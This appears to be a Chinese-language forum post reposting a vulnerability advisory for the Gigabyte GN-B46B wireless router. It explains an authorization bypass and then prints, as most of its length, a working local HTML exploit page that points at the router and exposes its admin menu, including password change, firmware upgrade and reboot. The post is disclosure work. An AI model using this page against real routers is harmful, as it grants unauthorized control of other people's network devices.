人不機車罔少年~機 | 【警告】技嘉科技 Gigabyte 無線網路 GN-B46B 驗証漏洞 【警告】技嘉科技 Gigabyte 無線網路 GN-B46B 驗証漏洞 官方產品資料 http://www.giga-byte.com.tw/Communic...ss_GN-B46B.htm This bug is an amazing Authorization Bypass, almost unexplained. The server protects all its files with "Basic Authorization". The Authorization cannot be bypassed in any other way except of requesting the files on the router from the html menu of the router. The problem is that this protection should work only when the html menu of the router is on the router itself.However if an attacker will use the router's menu from a local html, it will bypass the authorization and the attacker will be logged in. Truely amazing, exceptional. 攻擊代碼範例 <html>htdocs <head> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="expires" CONTENT="0"> <STYLE> #foldheader {CURSOR: hand}</STYLE> <base href="http://<host>"> <script language="javascript"> <!-- var lastIndex=-1; function change(){ if (event.srcElement.id=="foldheader") { var srcIndex = event.srcElement.sourceIndex var nested = document.all[srcIndex+2] if (nested.style.display=="none") { nested.style.display='' if (lastIndex>=0) { nested = document.all[lastIndex] nested.style.display="none" } lastIndex=srcIndex+2; } else { lastIndex=-1; nested.style.display="none" } } if (event.srcElement.id=="foldimage") { var srcIndex = event.srcElement.sourceIndex var nested = document.all[srcIndex+1] if (nested.style.display=="none") { nested.style.display='' if (lastIndex>=0) { nested = document.all[lastIndex] nested.style.display="none" } lastIndex=srcIndex+1; } else { lastIndex=-1; nested.style.display="none" } } } window.self.document.onclick=change if(document.images){ image1off=new Image image1off.src="../picture/button_setup.gif" image1on=new Image image1on.src="../picture/button_setup_over.gif" image2off=new Image image2off.src="../picture/button_status.gif" image2on=new Image image2on.src="../picture/button_status_over.gif" image3off=new Image image3off.src="../picture/button_logout.gif" image3on=new Image image3on.src="../picture/button_logout_over.gif" } function imgOn(imgName){ if(document.images){ document[imgName].src=eval(imgName+"on.src") } } function imgOff(imgName){ if(document.images){ document[imgName].src=eval(imgName+"off.src") } } function MoveOn(which_log, item) { dd = new Date(); time = dd.getTime(); offset = dd.getTimezoneOffset(); item.href = '../cgi-bin/SetData.cgi?LogMenu' + which_log + '\+' + Math.round(time/1000) + '\+' + offset; } //--> </script> <title>English</title> <style type="text/css"> body{font-family: Arial,verdana,Helvetica; font-size: 10pt; line-height: 18px;background:#ffffff;} .blueBg {background:#79A7EF;} .blackBg {background:#000000;} .grayBg {background:#EEEEEE;} .lightBlueBg {background:#9FBEEE;font-size:10pt;color:#000000;font-weight:bold;} .lightBlackBg {background:#000000;font-size:10pt;color:#FFFFFF;font-weight:bold;} .whiteBg {background:#ffffff;} .redText {color:#FF9000;} .tagText {color:#FF9000;font-weight:bold;background:#ffffff;} .blueText {color: rgb(0,0,0);} .orangeText {color:#FF9000;font-weight:bold;} .heading{color:#000000;font-size:10pt;font-weight:bold;background:#ECF2F4;} .heading1{color:#3333CC;font-size:10pt;background:#Eeeeee;} .heading2{color:#3333CC;font-size:10pt;font-weight:bold;background:#ECF2F4;} .headingLink{font-size:10pt;font-weight:bold;color:#ffffff;} .title{color:#ffffff;font-size:20pt;font-weight:bold;background:#9FBEEE;} .titleSub{color:#3333CC;font-size:15pt;font-weight:bold;background:#ffffff;} .titleSub1{color:#000000;font-size:13pt;font-weight:bold;background:#ffffff; } .buttonText{background-color: rgb(255,144,0);color:#ffffff;font-weight:bold;} A:link {color:#FFFFFF; font-style: normal; cursor: hand;text-decoration:none;} A:visited {color:rgb(255,255,255); font-style: normal;text-decoration:none;} A:active {color:#9FBEEE; font-style: normal;text-decoration:none;} A:hover {color:#9FBEEE; font-style:bold;text-decoration:underline;} </style> </head> <BODY style="background-color: #000000"> <center> <table cellpadding=0 cellspacing=0 border=0 width=180 class="blackBg"> <tr> <td height="25" colspan="3"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> <tr> <td colspan="3"><a href="/htdocs/BasicLANSetup.htm" target=main onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')"> <img src="../picture/button_setup.gif" border="0" name="image1" width="184" height="23"></a></td> </tr> <!-- <tr> <td colspan="3"><a href="/htdocs/status.htm" target=main onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')"> <img src="../picture/button_status.gif" border="0" name="image2" width="184" height="31"></a></td> </tr> --> <tr> <td colspan="3"><a href="../cgi-bin/SetData.cgi?ShowStatus" href="status.htm" target=main onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')"> <img src="../picture/button_status.gif" border="0" name="image2" width="184" height="31"></a></td> </tr> <tr> <td colspan="3"><a href="/htdocs/Logout.htm" target=_top onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')"> <img src="../picture/button_logout.gif" border="0" name="image3" width="184" height="29"></a></td> </tr> <tr> <td colspan="3" height="8"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> <tr> <td colspan="3"> <img src="../picture/button_advancedSetup.gif" border="0" width="174" height="34"></td> </tr> <tr> <td background="../picture/border_left.gif"> <img src="../picture/border_left.gif" width="15" height="19"></td> <td> <table cellpadding="0" cellspacing="0" border="0" width="160" class="lightBlackBg"> <tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> <tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Network Configuration <table id="network" border="0"> <tr class="headingLink"><td> <a href="NetworkSetup3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> LAN Configuration</a></td></tr> <tr class="headingLink"><td> <a href="NetworkSetup2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Configuration</a></td></tr> <tr class="headingLink"><td> <a href="NetworkSetup1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Setting</a></td></tr> </table> </td> </tr> <tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Wireless Configuration <table id="wireless" border="0"> <tr class="headingLink"><td> <a href="WirelessSetup2B.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> 802.11b</a></td></tr> <tr class="headingLink"><td> <a href="MACcontrol11b.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> MAC Access Control</a></td></tr> </table> </td> </tr> <tr> <td valign="top"><a href="/htdocs/StaticRouting.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Static Routing Table</a></td> </tr> <tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Virtual Server <table id="virtual" border="0"> <tr class="headingLink"><td> <a href="VirtualServer1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> DMZ</a></td></tr> <tr class="headingLink"><td> <a href="VirtualServer2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> PPPoE/DHCP/Static</a></td></tr> <tr class="headingLink"><td> <a href="VirtualServer3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> PPPoE Unnumber</a></td></tr> </table> </td> </tr> <tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Firewall Rule <table id="firewall" border="0"> <tr class="headingLink"><td> <a href="Firewall1.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Security</a></td></tr> <tr class="headingLink"><td> <a href="Firewall3.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> VPN Pass Through</a></td></tr> <tr class="headingLink"><td> <a href="Firewall2.htm" target=main ><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Static Rule</a></td></tr> </table> </td> </tr> <tr> <td valign="top"><a href="/htdocs/DNSReplay.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> DNS Replay</a></td> </tr> <tr> <td height="7"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> </table> </td> <td background="../picture/border_right.gif"> <img src="../picture/border_right.gif" width="19" height="19"></td> </tr> <tr> <td colspan="3"> <img src="../picture/button_management.gif" border="0" width="174" height="31"></td> </tr> <tr> <td background="../picture/border_left.gif"> <img src="../picture/border_left.gif" width="15" height="19"></td> <td> <table cellpadding="0" cellspacing="0" border="0" width="160" class="lightBlackBg"> <tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> <tr> <td valign="top"><a href="../cgi-bin/SetData.cgi?ShowPPPMonitor" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> PPP Monitor</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/Reboot.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Reboot</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/Initialization.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Initialization</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/ChangePassword.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Change Password</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/ChangeMAC.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Change WAN MAC</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/UpgradeFirmware.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Upgrade Firmware</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/BackUpRestore.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> BackUp/Restore</a></td> </tr> <tr> <td valign="top" id="foldheader"> <img src="../picture/icon_list.gif" align="absmiddle" id="foldimage" border="0" width="7" height="7"> Log Information <table id="log" border="0"> <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('firelog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> Firewall Log</a></td></tr> <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('connlog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> WAN Connection</a></td></tr> <tr class="headingLink"><td> <a href="#" target=main onclick="MoveOn('upnplog', this)"><img src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7" height="7"> UPnP Log</a></td></tr> </table> </td> </tr> <!-- <tr> <td valign="top"><a href="../cgi-bin/SetData.cgi?LogMenufirelog+0+0" target=main onclick="MoveOn('firelog')"> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Log Information</a></td> </tr> --> <tr> <td valign="top"><a href="/htdocs/Save.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Save Maintenance</a></td> </tr> <tr> <td valign="top"><a href="../others/Help.English.htm" target="_blank"> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Help</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/Ping.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> Ping</a></td> </tr> <tr> <td valign="top"><a href="/htdocs/About.htm" target=main> <img src="../picture/icon_list.gif" align="absmiddle" border="0" width="7" height="7"> About</a></td> </tr> <tr> <td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> </table> </td> <td background="../picture/border_right.gif"> <img src="../picture/border_right.gif" width="19" height="19"></td> </tr> <tr> <!--<td colspan="3"><img src="../picture/banner_bottom.gif" width="184" height="38"></td>--> </tr> <tr> <td colspan="3" height="20"><img src="../picture/spacer.gif" width="1" height="1"></td> </tr> </table> </center> </body> </html> <script language="javascript"> if(navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) >= 4) { network.style.display = "none" ; wireless.style.display = "none" ; virtual.style.display = "none" ; firewall.style.display = "none" ; log.style.display = "none" ; } </script> |
回覆 |
|
![]() | ||||
主題 | 主題作者 | 討論版 | 回覆 | 最後發表 |
【問題】IP分享器+ 無線網路 | small1219 | -- 無 線 網 路 版 | 3 | 2008-07-29 06:07 PM |
WORM RBOT.GN | grace0936 | -- OFFICE 相 關 軟 體 討 論 版 | 1 | 2006-08-31 09:58 PM |
無線網路 & CableModem | Calvin_bri | -- 無 線 網 路 版 | 3 | 2002-01-09 11:39 AM |
無線網路 DIY ----- 乙太網路實體層信號格式與波形篇 | 山賊 | -- 無 線 網 路 版 | 6 | 2001-10-03 12:36 AM |
無線網路 diy | 山賊 | -- 無 線 網 路 版 | 57 | 2001-08-07 06:18 PM |
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。